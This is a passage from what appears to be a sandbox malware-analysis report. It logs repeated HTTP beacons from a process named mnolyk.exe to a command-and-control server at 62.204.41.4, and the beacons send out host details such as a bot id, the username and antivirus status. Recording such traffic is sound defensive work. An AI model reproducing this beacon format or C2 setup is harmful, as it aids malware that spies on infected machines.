                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.706780910 CET | 678 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            49 | 192.168.2.4 | 49744 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:38.778107882 CET | 238 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.845237017 CET | 238 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            490 | 192.168.2.4 | 50185 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:43.888645887 CET | 678 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.951951981 CET | 679 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            491 | 192.168.2.4 | 50186 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:44.122139931 CET | 679 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.186357975 CET | 680 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            492 | 192.168.2.4 | 50187 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:44.356708050 CET | 680 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.420044899 CET | 681 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            493 | 192.168.2.4 | 50188 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:44.592464924 CET | 681 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.657511950 CET | 682 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            494 | 192.168.2.4 | 50189 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:44.828385115 CET | 682 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.893361092 CET | 683 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            495 | 192.168.2.4 | 50190 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:45.059725046 CET | 683 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.125121117 CET | 684 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            496 | 192.168.2.4 | 50191 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:45.295485973 CET | 684 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.361520052 CET | 685 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            497 | 192.168.2.4 | 50192 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:45.528131962 CET | 685 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.590791941 CET | 686 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            498 | 192.168.2.4 | 50193 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:45.766475916 CET | 686 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.831042051 CET | 687 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            499 | 192.168.2.4 | 50194 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:45.998769045 CET | 687 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.060642004 CET | 688 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            5 | 192.168.2.4 | 49700 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:25.618449926 CET | 194 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.682064056 CET | 194 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            50 | 192.168.2.4 | 49745 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:39.033149958 CET | 239 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:39.097521067 CET | 239 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            500 | 192.168.2.4 | 50195 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:46.232146025 CET | 688 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.296885014 CET | 689 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            501 | 192.168.2.4 | 50196 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:46.473902941 CET | 689 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.538629055 CET | 690 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            502 | 192.168.2.4 | 50197 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:46.717262983 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:46.781402111 CET | 691 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            503 | 192.168.2.4 | 50198 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:46.952790022 CET | 691 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.017493963 CET  692                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            504         192.168.2.4  50199        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:47.192794085 CET  692                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.256427050 CET  693                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            505         192.168.2.4  50200        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:47.437016010 CET  693                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:47.501085997 CET  694                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            506         192.168.2.4  50201        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:47.669673920 CET  694                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
